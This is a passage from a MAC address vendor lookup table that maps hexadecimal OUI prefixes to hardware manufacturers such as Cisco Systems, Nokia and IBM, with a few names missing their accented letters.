Research Institute +B4C44E VXL eTech Pvt +F0933A NxtConect +6052D0 Facts Engineering +8C278A Vocollect +FCAF6A Qulsar +ECE555 Hirschmann Automation +DCD0F7 Bentek Systems +D0574C Cisco Systems +8818AE Tamron +20D607 Nokia +58DB8D Fast +18EF63 Cisco Systems +CCCE40 Janteq +8C4DEA Cerio +ECFAAA The IMS Company +CC55AD RIM +F0F7B3 Phorm +E8757F Firs Technologies(shenzhen) +C83EA7 Kunbus Gmbh +E0CF2D Gemintek +68BDAB Cisco Systems +9CADEF Obihai Technology +D08999 Apcon +4454C0 Thompson Aerospace +B4A4E3 Cisco Systems +90903C Trison Technology +94DD3F A+V Link Technologies +C8EE08 Tangtop Technology +7472F2 Chipsip Technology +5CD998 D-Link +D46CDA CSM GmbH +C4F464 Spica international +544A05 wenglor sensoric gmbh +5CCA32 Theben AG +84C7A9 C3po +F8AC6D Deltenna +641084 Hexium Technical Development +C416FA Prysm +E0C286 Aisai Communication Technology +D84B2A Cognitas Technologies +684B88 Galtronics Telemetry +842914 Emporia Telecom Produktions- und Vertriebsgesmbh & KG +4C8B55 Grupo Digicon +04A3F3 Emicon +F866F2 Cisco Systems +7C55E7 YSI +C02BFC iNES. applied informatics GmbH +AC34CB Shanhai Gbcom Communication Technology +D4A928 GreenWave Reality +9CFFBE Otsl +2CD1DA Sanjole +100E2B NEC Casio Mobile Communications +445EF3 Tonalite Holding +100C24 pomdevices +58F6BF Kyoto University +7CED8D Microsoft +54FDBF Scheidt & Bachmann GmbH +B40EDC LG-Ericsson +A4D1D1 ECOtality North America +C8D5FE Shenzhen Zowee Technology +C49313 100fio networks technology +A4A80F Shenzhen Coship Electronics +B8921D BG T&A +48FCB8 Woodstream +548922 Zelfy +F8C091 Highgates Technology +6C5CDE SunReports +241F2C Calsys +284846 GridCentric +58B9E1 Crystalfontz America +646707 Beijing Omnific Technology +D4000D Phoenix Broadband Technologies +E87AF3 S5 Tech S.r.l. +40C7C9 Naviit +A0A763 Polytron Vertrieb GmbH +D496DF Sungjin C&T +D07DE5 Forward Pay Systems +7CEF18 Creative Product Design +FCD4F6 Messana Air.Ray Conditioning s.r.l. +0CD696 Amimon +B43741 Consert +F8FB2F Santur +2CCD43 Summit Technology Group +6C8D65 Wireless Glue Networks +CCFCB1 Wireless Technology +CC5C75 Weightech Com. Imp. Exp. Equip. Pesagem Ltda +A098ED Shandong Intelligent Optical Communication Development +34C69A Enecsys +502A8B Telekom Research and Development Sdn Bhd +F88DEF Tenebraex +EC43E6 Awcer +F0EC39 Essec +5849BA Chitai Electronic +181714 Daewoois +80B289 Forworld Electronics +14A62C S.M. Dezac +A8F470 Fujian Newland Communication Science Technologies +DC1D9F U & B tech +081651 Shenzhen SEA Star Technology +DC49C9 Casco Signal +B09134 Taleo +A863DF Displaire +104369 Soundmax Electronic Limited +C06C0F Dobbs Stanford +5475D0 Cisco Systems +BC6A16 tdvine +C8EF2E Beijing Gefei Tech. +98DCD9 Unitec +30525A NST +6089B7 Kael Mhendslk Elektronk Tcaret Sanay Lmted rket +2CA780 True Technologies +545FA9 Teracom Limited +ECC882 Cisco Systems +A0B9ED Skytap +502DF4 Phytec Messtechnik GmbH +38E8DF b gmbh medien + datenbanken +10189E Elmo Motion Control +88FD15 Lineeye +10445A Shaanxi Hitech Electronic +60B3C4 Elber Srl +04C880 Samtec +884B39 Siemens AG, Healthcare Sector +44C233 Guangzhou Comet Technology DevelopmentLtd +B482FE Askey Computer +307C30 RIM +BC4E3C Core Staff +80BAAC TeleAdapt +FC4463 Universal Audio +F06853 Integrated +10E6AE Source Technologies +A4ADB8 Vitec Group, Camera Dynamics +90A2DA Gheo SA +C41ECE HMI Sources +BCD5B6 d2d technologies +1C8F8A Phase Motion Control SpA +A4B1EE H. Zander Gmbh & KG +486FD2 StorSimple +D4F143 Iproad. +CC5459 OnTime Networks AS +3CB17F Wattwatchers Ld +00DB45 Thamway +A0231B TeleComp R&D +94C4E9 PowerLayer Microsystems HongKong Limited +8843E1 Cisco Systems +B4ED19 Pie Digital +888717 Canon +E0271A TTC Next-generation Home Network System WG +84C727 Gnodal +E4AB46 UAB Selteka +D479C3 Cameronet GmbH & KG +945B7E Trilobit LTDA. +E85B5B LG Electronics +20D906 Iota +404022 ZIV +74F726 Neuron Robotics +18FC9F Changhe Electronics +A438FC Plastic Logic +601D0F Midnite Solar +50A6E3 David Clark Company +549A16 Uzushio Electric +4001C6 3com Europe +608D17 Sentrus Government Systems Division +80912A Lih Rong electronic Enterprise +8038FD LeapFrog Enterprises +7072CF EdgeCore Networks +803B9A ghe-ces electronic ag +9CCD82 Cheng UEI Precision Industry +C8AACC Private +003D41 Hatteland Computer AS +087618 ViE Technologies Sdn. Bhd. +A4AD00 Ragsdale Technology +2C1984 IDN Telecom +3863F6 3nod Multimedia(shenzhen)co. +DCE2AC Lumens Digital Optics +98D88C Nortel Networks +C8873B Net Optics +B0E97E Advanced Micro Peripherals +D44CA7 Informtekhnika & Communication +202CB7 Kong Yue Electronics & Information Industry (Xinhui) +68CC9C Mine Site Technologies +04B466 BSP +E41F13 IBM +00271B Alec Sicherheitssysteme GmbH +002718 Suzhou NEW Seaunion Video Technology +00270C Cisco Systems +00270B Adura Technologies +002705 Sectronic +002706 Yoisys +0026F9 S.E.M. srl +0026F3 SMC Networks +688540 IGI Mobile +6465C0 Nuvon +F0DE71 Shanghai EDO Technologies +28FBD3 Ragentek Technology Group +7C1EB3 2N Telekomunikace a.s. +146E0A Private +1045F8 LNT-Automation GmbH +644F74 Lenus +787F62 GiK mbH +D4AAFF Micro World +C4FCE4 DishTV NZ +0CD7C2 Axium Technologies +40F52E Leica Microsystems (Schweiz) AG +64BC11 CombiQ AB +4097D1 BK Electronics cc +68AAD2 Datecs +0026EC Legrand Home Systems +0026E6 Visionhitech +0026E0 Asiteq +0026DA Universal Media /Slovakia/ s.r.o. +0026D3 Zeno Information System +0026D4 Irca SpA +0026CD PurpleComm +10880F Daruma Telecomunicaes e Informtica +4C4B68 Mobile Device +94BA31 Visiontec da Amaznia Ltda. +F45FF7 DQ Technology +60F13D Jablocom S.r.o. +0CEF7C AnaCom +E08FEC Repotec +D0D286 Beckman Coulter K.K. +1C0FCF Sypro Optics GmbH +0025AB AIO LCD PC BU / TPV +0025A4 EuroDesign embedded technologies GmbH +00259D Private +002598 Zhong Shan City Litai Electronic Industrial +002591 Nextek +00258C Esus Elektronik SAN. VE DIS. TIC. STI. +002587 Vitality +002581 x-star networks +002582 Maksat Technologies (P) +002578 JSC Concern Sozvezdie +00257D PointRed Telecom Private +002577 D-BOX Technologies +002571 Zhejiang Tianle Digital Electric +00256A inIT - Institut Industrial IT +002565 Vizimax +00255E Shanghai Dare Technologies +002558 Mpedia +002635 Bluetechnix GmbH +00262F Hamamatsu TOA Electronics +002623 JRD Communication +002628 companytec automao e controle ltda. +00261C Neovia +002615 Teracom Limited +002616 Rosemount +002610 Apacewave Technologies +002609 Phyllis +00268C StarLeaf +002686 Quantenna Communcations +002680 SIL3Ltd +00267F Zenterio AB +00267A wuhan hongxin telecommunication technologies +002679 Euphonic Technologies +002673 Ricoh Company +00266D MobileAccess Networks +0025D6 The Kroger +0025CA LS Research +0025BE Tektrap Systems +0025BD Italdata Ingegneria dell'Idea +0025B7 Costar electronics +0025B0 Schmartz +002546 Cisco Systems +002545 Cisco Systems +002535 Minimax GmbH & KG +002532 Digital Recorders +00252B Stirling Energy Systems +0025FD OBR Centrum Techniki Morskiej +002603 Shenzhen Wistar Technology +0025F3 Nordwestdeutsche Zhlerrevision +0025EC Humanware +0025E2 Everspring Industry +0025DD Sunnytek Information +002667 Carecom +002660 Logiways +002656 Sansonic Electronics USA +002653 DaySequerra +00264C Shanghai DigiVision Technology +002647 WFE Technology +00263B Onbnetech +0026C1 Artray +0026B5 Icomm Tele +0026AF Duelco A/S +0026A5 Microrobot.co. +00269F Private +002699 Cisco Systems +002489 Vodafone Omnitel N.V. +00248E Infoware ZRt. +002476 TAP.tv +00246F Onda Communication spa +00246A Solid Year +0023FA RG Nets +0023FF Beijing Httc Technology +0023F4 Masternaut +0023EA Cisco Systems +0023E4 IPnect +0023DE Ansync +0023D1 TRG +0023CB Shenzhen Full-join Technology +0023D2 Inhand Electronics +0024B4 Escatronic Gmbh +0024AD Adolf Thies Gmbh & KG +00249C Bimeng Comunication System +002526 Genuine Technologies +002525 Ctera Networks +002520 SMA Railway Technology GmbH +00251B Philips CareServant +002516 Integrated Design Tools +00250F On-Ramp Wireless +002503 IBM +00250A Security Expert +0024DD Centrak +0024D8 IlSung Precision +0024CC Fascinations Toys and Gifts +0024D1 Thomson +0024CA Tobii Technology AB +0024C5 Meridian Audio Limited +0024B9 Wuhan Higheasy Electronic Technology DevelopmentLtd +002425 Shenzhenshi chuangzhicheng Technology +002419 Private +002412 Benign Technologies +00240C Delec Gmbh +002406 Pointmobile +0023F9 Double-Take Software +002463 Phybridge +002459 ABB Automation products GmbH +00245E Hivision +002451 Cisco Systems +00244C Solartron Metrology +00243F Storwize +002440 Halo Monitoring +00243B Cssi (S) Pte +0024FC QuoPin +0024F7 Cisco Systems +0024F0 Seanodes +0024EB ClearPath Networks +0024E4 Withings +002435 Wide +00242F Micron +00241F DCT-Delta GmbH +0023C5 Radiation Safety and Control Services +0023C4 Lux Lumen +0023B8 Sichuan Jiuzhou Electronic Technology +0023BF Mainpine +0023B2 Intelligent Mechatronic Systems +0023AC Cisco Systems +0023A0 Hana CNS +0023A5 SageTV +0022B6 Superflow Technologies Group +0022A3 California Eastern Laboratories +00229E Social Aid Research +002291 Cisco Systems +002292 Cinetal +002297 Xmos Semiconductor +00228B Kensington Computer Products Group +002284 Desay A&V Science AND Technology +002277 NEC Australia +00226D Shenzhen Giec Electronics +002263 Koos Technical Services +002267 Nortel Networks +002259 Guangzhou New Postcom Equipment +0022E4 Apass Technology +0022DD Protecta Electronics +0022D8 Shenzhen GST Security and Safety Technology Limited +0022D1 Albrecht Jung GmbH & KG +0022C3 Zeeport Technology +0022C7 Segger Microcontroller Gmbh & KG +0022BD Cisco Systems +002344 Objective Interface Systems +002343 TEM AG +002337 Global Star Solutions ULC +00232B IRD A/S +00231C Fourier Systems +00231B Danaher Motion - Kollmorgen +00239F Institut fr Prftechnik +002393 Ajinextek +00238F Nidec Copal +002385 Antipode +00237E Elster Gmbh +002379 Union Business Machines +002253 Entorian Technologies +002250 Point Six Wireless +002249 Home Multienergy SL +00224A Raylase AG +002240 Universal Telecom S/A +00222D SMC Networks +00222E maintech GmbH +002364 Power Instruments Pte +002369 Cisco-Linksys +002370 Snell +00235D Cisco Systems +002356 Packet Forensics +002313 Qool Technologies +00230D Nortel Networks +002301 Witron Technology Limited +0022F7 Conceptronic +0022EA Rustelcom +0022F0 3 Greens Aviation Limited +0022E9 ProVision Communications +00211C Cisco Systems +002117 Tellord +002110 Clearbox Systems +002106 RIM Testing Services +001FFF Respironics +001FFE HPN Supply Chain +001FF8 Siemens AG, Sector Industry, Drive Technologies, Motion Control Systems +001FFD Indigo Mobile Technologies +002221 Itoh Denki +00221B Morega Systems +002220 Mitac Technology +002227 uv-electronic GmbH +002214 Rinnai Korea +00220E Indigo Security +002208 Certicom +002201 Aksys Networks +0021F7 HPN Supply Chain +0021A0 Cisco Systems +00219C Honeywld Technology +002192 Baoding Galaxy Electronic Technology +00218C Topcontrol Gmbh +00217F Intraco Technology Pte +00217A Sejin Electron +002179 Iogear +002173 Ion Torrent Systems +001FC3 SmartSynch +001FC8 Up-Today Industrial +001FC1 Hanlong Technology +001FC2 Jow Tong Technology +001FBC Evga +001FB0 TimeIPS +001FB5 I/O Interconnect +001FA9 Atlanta DTH +0021F1 Tutus Data AB +0021F2 Easy3call Technology Limited +0021EB ESP Systems +0021E5 Display Solution AG +0021E4 I-win +0021DF Martin Christ GmbH +0021D8 Cisco Systems +0021CC Flextronics International +001FF1 Paradox Hellas +001FEC Synapse lectronique +001FE5 In-Circuit GmbH +001FD9 RSD Communications +001FD4 4ipnet +001FCF MSI Technology GmbH +00213F A-Team Technology +002139 Escherlogic +002134 Brandywine Communications +00212F Phoebe Micro +002129 Cisco-Linksys +00212A Audiovox +002123 Aerosat Avionics +00216D Soltech +00216C Odva +002167 HWA JIN T&I +002160 Hidea Solutions +002154 D-tacq Solutions +00214D Guangzhou Skytone Transmission Technology Com. +002148 Kaco Solar Korea +0021C5 3DSP +0021BF Hitachi High-Tech Control Systems +0021C0 Mobile Appliance +0021B9 Universal Devices +0021B3 Ross Controls +0021B2 Fiberblaze A/S +0021AD Nordic ID Oy +0021A6 Videotec Spa +001F11 Openmoko +001F0B Federal State Unitary Enterprise Industrial UnionElectropribor +001EFF Mueller-Elektronik GmbH & KG +001F06 Integrated Dispatch Solutions +001F05 iTAS Technology +001EF3 From2 +001EF8 Emfinity +001F7A WiWide +001F70 Botik Technologies +001F75 GiBahn Media +001F64 Beijing Autelan Technology +001F5E Dyna Technology +001F58 EMH Energiemesstechnik GmbH +001F4C Roseman Engineering +001F51 HD Communications +001F4B Lineage Power +001F9F Thomson Telecom Belgium +001F93 Xiotech +001F98 Daiichi-dentsu +001F8C CCS +001F8A Ellion Digital +001F83 Teleplan Technology Services Sdn Bhd +001E30 Shireen +001E2B Radio Systems Design +001E24 Zhejiang Bell Technology +001E18 Radio Activity srl +001E1D East Coast Datacom +001E1E Honeywell Life Safety +001E13 Cisco Systems +001E0E Maxi View Holdings Limited +001E60 Digital Lighting Systems +001E59 Silicon Turnkey Express +001E54 Toyo Electric +001E4D Welkin Sciences +001E48 Wi-Links +001E43 Aisin AW +001E3E KMW +001EC3 Kozio +001EBC Wintech Automation +001EB7 TBTech +001EB0 ImesD Electronica S.L. +001EA5 Robotous +001EAB TeleWell Oy +001E9E ddm hopt + schuler Gmbh + KG +001E99 Vantanol Industrial +001F36 Bellwin Information +001F35 Air802 +001F30 Travelping +001F23 Interacoustics +001F24 Digitview Technology +001F1D Atlas Material Testing Technology +001E92 Jeulin +001E89 Crfs Limited +001E84 Pika Technologies +001E83 Lan/man Standards Association (lmsc) +001E6C Opaque Systems +001EE6 Shenzhen Advanced Video Info-Tech +001EE0 Urmet Domus SpA +001EDB Giken Trastem +001ED6 Alentec & Orion AB +001ECF Philips Electronics UK +001C96 Linkwise Technology Pte +001C91 Gefen +001C8A Cirrascale +001C84 STL Solution +001C80 New Business Division/Rhea-Information +001C76 The Wandsworth Group +001C6F Emfit +001C71 Emergent Electronics +001C70 Novacomm Ltda +001C6A Weiss Engineering +001D59 Mitra Energy & Infrastructure +001D52 Defzone +001D4C Alcatel-Lucent +001D48 Sensor-Technik Wiedemann GmbH +001D41 Hardy Instruments +001D3C Muscle +001D30 YX Wireless +001D35 Viconics Electronics +001D2F QuantumVision +001CD3 ZP Engineering SEL +001CCE By Techdesign +001CC7 Rembrandt Technologies, D/b/a Remstream +001CC2 Part II Research +001CBB MusicianLink +001CB1 Cisco Systems +001CB7 USC DigiArk +001CA3 Terra +001CA5 Zygo +001CAA Bellon +001C9D Liecthi AG +001DCA PAV Electronics Limited +001DC4 Aioi Systems +001DC3 Rikor TV +001DB1 Crescendo Networks +001DB2 Hokkaido Electric Engineering +001DB7 Tendril Networks +001DAD Sinotech Engineering Consultants, Geotechnical Enginee +001DA8 Takahata Electronics +001DA7 Seamless Internet +001DA1 Cisco Systems +001D9A Godex International +001D95 Flash +001D8E Alereon +001D87 VigTech Labs Sdn Bhd +001D88 Clearwire +001D7E Cisco-Linksys +001D7D Giga-byte Technology +001D6C ClariPhy Communications +001D71 Cisco Systems +001D78 Invengo Information Technology +001D65 Microwave Radio Communications +001D5E Coming Media +001D29 Doro AB +001D22 Foss Analytical A/S +001D1D Inter-M +001D16 SFR +001D10 LightHaus Logic +001D0A Davis Instruments +001D03 Design Solutions +001CFE Quartics +001CF7 AudioScience +001CE6 Innes +001CE1 Indra Sistemas +001CDA Exegin Technologies Limited +001E07 Winy Technology +001E02 Sougou Keikaku Kougyou +001E01 Renesas Technology Sales +001DFB Netcleus Systems +001DEF Trimm +001DE8 Nikko Denki Tsushin(ndtc) +001DE3 Intuicom +001DDD DAT H.K. Limited +001AF8 Copley Controls +001AF3 Samyoung Electronics +001AEE Shenztech +001AE2 Cisco Systems +001AE7 Aztek Networks +001AD4 iPOX Technology +001AD6 Jiagnsu Aetna Electric +001B97 Violin Technologies +001B9C Satel sp. z o.o. +001B90 Cisco Systems +001B86 Bosch Access Systems GmbH +001B8B NEC Platforms +001B7F TMN Technologies Telecomunicacoes Ltda +001B81 Dataq Instruments +001B80 Lord +001B73 DTL Broadcast +001B6E Anue Systems +001B67 Cisco Systems +001B60 Navigon AG +001B54 Cisco Systems +001B48 Shenzhen Lantech Electronics +001B4D Areca Technology +001B41 General Infinity +001B3C Software Technologies Group +001B35 Chongqing Jinou Science & Technology Development +001B2E Sinkyo Electron +001B30 Solitech +001BC7 StarVedia Technology +001BC6 Strato Rechenzentrum AG +001BBB RFTech +001BB6 Bird Electronic +001BAA XenICs nv +001BA3 Flexit Group GmbH +001C63 Truen +001C57 Cisco Systems +001C5E Aston France +001C46 Qtum +001C3A Element Labs +001C41 scemtec Transponder Technology GmbH +001C34 Huey Chiao International +001C33 Sutron +001BF7 Lund IP Products AB +001BF9 Intellitect Water +001BF8 Digitrax +001BF2 Kworld Computer +001BEB DMP Electronics +001BE6 VR AG +001BDF Iskra Sistemi d.d. +001BD8 DVTel +001BCC Kingtek Cctv Alliance +001AC8 ISL (Instrumentation Scientifique de Laboratoire) +001ACF C.T. Elettronica +001AC3 Scientific-Atlanta +001AB9 PMC +001ABE Computer Hi-tech +001AAB eWings s.r.l. +001AB2 Cyber Solutions +001AB7 Ethos Networks +001C2E HPN Supply Chain +001C27 Sunell Electronics +001C22 Aeris Elettronica s.r.l. +001C1D Chenzhou Gospell Digital Technology +001C18 Sicert S.r.L. +001C0A Shenzhen AEE Technology +001C05 Nonin Medical +001BFE Zavio +001B29 Avantis.Co. +001B23 SimpleComTools +001B1E Hart Communication Foundation +001B12 Apprion +001B0B Phidgets +001B10 ShenZhen Kang Hui Technology +001B04 Affinity International S.p.a +001AFF Wizyoung Tech. +001AFD Evolis +00191C Sensicast Systems +00191E Beyondwiz +001923 Phonex Korea +00192A Antiope Associates +001910 Knick Elektronische Messgeraete GmbH & KG +001917 Posiflex +001909 Devi - Danfoss A/S +00190B Southern Vision Systems +001904 WB Electronics Sp. z o.o. +0018FF PowerQuattro +0018FA Yushin Precision Equipment +001955 Cisco Systems +00194E Ultra Electronics - TCS (Tactical Communication Systems) +001950 Harman Multimedia +001949 Tentel Comtech +001942 ON Software International Limited +00193D GMC Guardian Mobility +001936 Sterlite Optical Technologies Limited +00193B Wilibox Deliberant Group +00192F Cisco Systems +001A20 Cmotech +001A22 eQ-3 Entwicklung GmbH +001A14 Xin Hua Control Engineering +001A0D HandHeld entertainment +001A0F Sistemas Avanzados de Control +001A08 Simoco +001A01 Smiths Medical +0019FC PT. Ufoakses Sukses Luarbiasa +0019EF Shenzhen Linnking Electronics +0019F1 Star Communication Network Technology +0019F6 Acconet (PTE) +001A76 SDT information Technology +001A6F MI.TEL s.r.l. +001A6A Tranzas +001A63 Elster Solutions +001A5E Thincom Technology +001A57 Matrix Design Group +001A5C Euchner GmbH+Co. KG +001A50 PheeNet Technology +001A9D Skipper Wireless +001AA2 Cisco Systems +001A91 FusionDynamic +001A96 Ecler +001A90 Trpico Sistemas e Telecomunicaes da Amaznia LTDA. +001A8C Sophos +001A85 NV Michel Van de Wiele +001A87 Canhold International Limited +001A86 AdvancedIO Systems +0019B5 Famar Fueguina +0019BA Paradox Security Systems +0019A2 Ordyn Technologies +0019AE Hopling Technologies +0019A7 Itu-t +001996 TurboChef Technologies +00199B Diversified Technical Systems +001991 avinfo +00198A Northrop Grumman Systems +00198C iXSea +001985 IT Watchdogs +00196B Danpex +001966 Asiarock Technology Limited +00195C Innotech +001961 Blaupunkt Embedded Systems GmbH +0019DE Mobitek +0019EA TeraMage Technologies +0019D0 Cathexis +0019D7 Fortunetek +0019B3 Stanford Research Systems +001A44 JWTrading +001A49 Micro Vision +001A3D Ajin Vision +001A31 Scan Coin Industries AB +001A38 Sanmina-SCI +001A2C Satec +001A27 Ubistar +0017AE GAI-Tronics +0017A2 Camrivox +0017A7 Mobile Computing Promotion Consortium +00179D Kelman Limited +001791 LinTech GmbH +001796 Rittmeyer AG +001798 Azonic Technology +00178A Darts Technologies +00177E Meshcom Technologies +001785 Sparr Electronics +001809 Cresyn +00180E Avega Systems +001810 IPTrade +0017F6 Pyramid Meriden +0017FB FA +0017FD Amulet Hotkey +0017EF IBM +0017D7 ION Geophysical +0017DC Daemyung Zero1 +0017DE Advantage Six +0018C3 CS +0018CA Viprinet GmbH +0018BE Ansa +0018B2 Adeunis RF +0018B7 D3 LED +0018AB Beijing Lhwt Microelectronics +0018A6 Persistent Systems +001895 Hansun Technologies +00189A Hana Micron +0018E7 Cameo Communications +0018EE Videology Imaging Solutions +0018E2 Topdata Sistemas de Automacao Ltda +0018DB EPL Technology +0018E0 Anaveo +0018CF Baldor Electric Company +0018D4 Unified Display Interface SIG +00184A Catcher +00184C Bogen Communications +001845 Pulsar-Telecom +00183E Digilent +001828 e2v technologies (UK) +00182D Artec Design +001821 Sindoricoh +001815 GZ Technologies +00181C Exterity Limited +001772 Astro Strobel Kommunikationssysteme Gmbh +001777 Obsidian Research +00176E Ducati Sistemi +001762 Solar Technology +001769 Cymphonix +00175D Dongseo system. +00175B ACS Solutions Switzerland +001756 Vinci Labs Oy +00174F iCatch +0017CD CEC Wireless R&D +0017D2 Thinlinx +0017C6 Cross Match Technologies +0017BA Sedo +0017BF Coherent Research Limited +0017C1 CM Precision Technology +0017B3 Aftek Infosys Limited +00186A Global Link Digital Technology +00186F Setha Industria Eletronica Ltda +001876 WowWee +001869 Kingjim +001864 Eaton +00185D Taiguen Technology (shen-zhen) +001851 SWsoft +001858 TagMaster AB +00189F Lenntek +00188E Ekahau +001887 Metasystem SpA +001889 WinNet Solutions Limited +00187B 4NSYS +001661 Novatium Solutions (P) +001663 KBT Mobile +001668 Eishin Electronics +001662 Liyuh Technology +00165C Trackflow +001655 Fuho Technology +0015E4 Zimmer Elektromedizin +0015DA Iritel A.D. +0015DF Clivet +0015D3 Pantech&Curitel Communications +0015C7 Cisco Systems +0015C0 Digital Telemedia +0015BA iba AG +00174A Socomec +001743 Deck Srl +00173D Neology +00173E LeucotronEquipamentos Ltda. +001738 International Business Machines +00172C Taejin Infotech +001720 Image Sensing Systems +001725 Liquid Computing +001701 KDE +001703 Mosdan Internation +0016FC Tohken +0016F0 Dell +0016F5 Dalian Golden Hualu Digital Technology +0016E9 Tiba Medical +0016E4 Vanguard Security Engineering +0016DD Gigabeam +0016E2 American Fibertek +0016D8 Senea AB +00169C Cisco Systems +00169E TV One +0016A3 Ingeteam Transmission&Distribution +001690 J-tek Incorporation +001697 NEC +001689 Pilkor Electronics +00168B Paralan +001684 Donjin +00167D Sky-Line Information +001678 Shenzhen Baoan Gaoke Electronics +001649 SetOne GmbH +00163F Crete Systems +001638 Tecom +001633 Oxford Diagnostics +00162C Xanboo +001627 Embedded-logic Design AND More Gmbh +001619 Lancelan Technologies S.L. +001614 Picosecond Pulse Labs +001719 Audiocodes USA +00171E Theo Benning GmbH & KG +001712 Isco International +00170D Dust Networks +00160F Badger Meter +00160A Sweex Europe BV +001603 Coolksky +0015F7 Wintecronics +0015F0 EGO BV +0015EA Tellumat (Pty) +0016C5 Shenzhen Xing Feng Industry +0016C7 Cisco Systems +0016CC Xcute Mobile +0016C0 Semtech +0016B4 Private +0016A8 CWT +0016AD BT-Links Company Limited +001553 Cytyc +001555 DFM GmbH +00154E IEC +001547 AiZen Solutions +001542 Microhard S.r.l. +00153B EMH metering GmbH & KG +001534 A Beltrnica-Companhia de Comunicaes +001440 Atomic +001434 Keri Systems +00142D Toradex AG +001426 NL Technology +001421 Total Wireless Technologies Pte. +00141C Cisco Systems +001583 IVT +00157E Weidmller Interface GmbH & KG +001579 Lunatone Industrielle Elektronik GmbH +001574 Horizon Semiconductors +001566 A-First Technology +001561 JJPlus +00155A Dainippon Pharmaceutical +001554 Atalum Wireless +001528 Beacon Medical Products d.b.a. BeaconMedaes +001521 Horoquartz +001523 Meteor Communications +001522 Dea Security +00151C Leneco +001512 Zurich University of Applied Sciences +00150B Sage Infotech +001506 Neo Photonics +0014FF Precise Automation +0014F8 Scientific Atlanta +0014F3 ViXS Systems +0014E7 Stolinx +0014EC Acro Telecom +0014E2 datacom systems +0014D6 Jeongmin Electronics +0014DB Elma Trenew Electronic GmbH +0014DD Covergence +0014DC Communication System Design & Manufacturing (csdm) +0014CF Invisio Communications +0014CA Key Radio Systems Limited +0014C3 Seagate Technology +0014BC Synectic Telecom Exports PVT. +0014B7 AR Infotek +0014AD Gassner Wiege- und Metechnik GmbH +0014B2 mCubelogics +0014A6 Teranetics +00149F System and Chips +0014A1 Synchronous Communication +001470 Prokom Software SA +001469 Cisco Systems +001462 Digiwell Technology +00145D WJ Communications +001450 Heim Systems GmbH +001456 Edge Products +00144C General Meters +001445 Telefon-Gradnja d.o.o. +001447 Boaz +001446 SuperVision Solutions +0015B3 Caretech AB +0015A9 Kwang WOO I&C +00159D Tripp Lite +001591 RLW +00158A Surecom Technology +00158F NTT Advanced Technology +001590 Hectronic GmbH +0014A0 Accsense +001493 Systimax Solutions +00148E Tele Power +001487 American Technology Integrators +001482 Aurora Networks +001481 Multilink +00147C 3Com +001475 Wiline Networks +0012E7 Projectek Networking Electronics +0012E8 Fraunhofer IMS +0012DB Ziehl Industrie-elektronik Gmbh + KG +0012E2 Alaxala Networks +0012D6 Jiangsu Yitong High-Tech +0012D5 Motion Reality +0012C3 WIT +0013E5 Tenosys +0013EA Kamstrup A/S +0013DE Adapt4 +0013D7 Spidcom Technologies SA +0013D8 Princeton Instruments +0013CF 4Access Communications +0013D2 Page Iberica +0013C9 Beyond Achieve Enterprises +0013C2 Wacom +0013BD Hymatom SA +0013B8 RyCo Electronic Systems Limited +00134E Valox Systems +001353 Hydac Filtertechnik Gmbh +00134D Inepro BV +001347 Red Lion Controls +00133B Speed Dragon Multimedia Limited +001340 AD.EL s.r.l. +00132E ITian Coporation +001328 Westech Korea +00132D iWise Communications +001334 Arkados +0013B3 Ecom Communications Technology +0013AC Sunmyung Electronics +0013A6 Extricom +0013A5 General Solutions +0013A0 Algosystem +001399 Stac +001393 Panta Systems +001394 Infohand +00138D Kinghold +0012C8 Perfect tech +0012B9 Fusion Digital Technology +0012BE Astek +0012AC Ontimetek +0012AB WiLife +0012B2 Avolites +0012A6 Dolby Australia +001378 Qsan Technology +00137D Dynalab +001384 Advanced Motion Controls +00137E CorEdge Networks +00136C TomTom +00136B E-tec +001359 ProTelevision Technologies A/S +00135E Eab/rwi/k +00129F RAE Systems +001299 Ktech Telecommunications +00129A IRT Electronics +00128C Woodward Governor +001293 GE Energy +001287 Digital Everywhere Unterhaltungselektronik GmbH +001280 Cisco Systems +00131E Peiker acustic GmbH & KG +001323 Cap +00130B Mextal +001312 Amedia Networks +0012F8 WNI Resources +0012FF Lely Industries N.V. +001304 Flaircomm Technologies +001410 Suzhou Keda Technology +001417 RSE Informations Technologie GmbH +001408 Eka Systems +001402 kk-electronic a/s +001401 Rivertree Networks +0013FB RKC Instrument +0013F4 Psitek (Pty) +0013EF Kingjon Digital Technology +0011F7 Shenzhen Forward Industry +0011F2 Institute of Network Technologies +0011EB Innovative Integration +0011E6 Scientific Atlanta +0011E5 KCodes +0011DF Current Energy +0011D3 NextGenTel Holding ASA +00110E Tsurusaki Sealand Transportation +001115 Epin Technologies +001114 EverFocus Electronics +001107 RGB Networks +001108 Orbital Data +001102 Aurora Multimedia +000FFC Merit Li-Lin Ent. +000FDA Yazaki +000FF3 Jung Myoung Communications&Technology +0011A2 Manufacturing Technology +00119B Telesynergy Research +00118C Missouri Department of Transportation +001191 CTS-Clima Temperatur Systeme GmbH +001196 Actuality Systems +001179 Singular Technology +001172 Cotron +001166 Taelim Electronics +00116B Digital Data Communications Asia +00116C Nanwang Multimedia +001162 Star Micronics +001161 NetStreams +001155 Sevis Systems +00115C Cisco Systems +001147 Secom-IndustryLTD. +00114C caffeina applied research +001274 NIT lab +00127A Sanyu Industry +00126D University of California, Berkeley +001268 IPS d.o.o. +001267 Panasonic +001261 Adaptix +001257 LeapComm Communication Technologies +001222 Skardin (UK) +001227 Franklin Electric +00121B Sound Devices +001221 B.Braun Melsungen AG +001214 Koenig & Bauer AG +00120F Ieee 802.3 +001208 Gantner Instruments GmbH +001201 Cisco Systems +001202 Decrane Aerospace - Audio International +0011C7 Raymarine UK +0011CC Guangzhou Jinpeng Group +0011B5 Shenzhen Powercom +0011BA Elexol +0011C1 4P Mobile Data Processing +0011A8 Quest Technologies +0011A7 Infilco Degremont +001250 Tokyo Aircaft Instrument +00124B Texas Instruments +001244 Cisco Systems +001238 SetaBox Technology +00123D GES +00123E Erune Technology +00122C Soenen Controls N.V. +001231 Motion Control Systems +001146 Telecard-Pribor +001140 Nanometrics +001139 Stoeber Antriebstechnik Gmbh + KG. +00113A Shinboram +001134 MediaCell +001127 TASI +00112A Niko NV +001121 Cisco Systems +000EBB Everbee Networks +000EB4 Guangzhou Gaoke Communications Technologyltd. +000EAE Gawell Technologies +000EA8 United Technologists Europe Limited +000EAD Metanoia Technologies +000EA1 Formosa Teletek +000E9C Benchmark Electronics +000E9B Ambit Microsystems +000E8E SparkLAN Communications +000E95 Fujiya Denki Seisakusho +000FC1 Wave +000FC8 Chantry Networks +000FC7 Dionica R&D +000FBA Tevebox AB +000FA7 Raptor Networks Technology +000FAE E2O Communications +000FA8 Photometrics 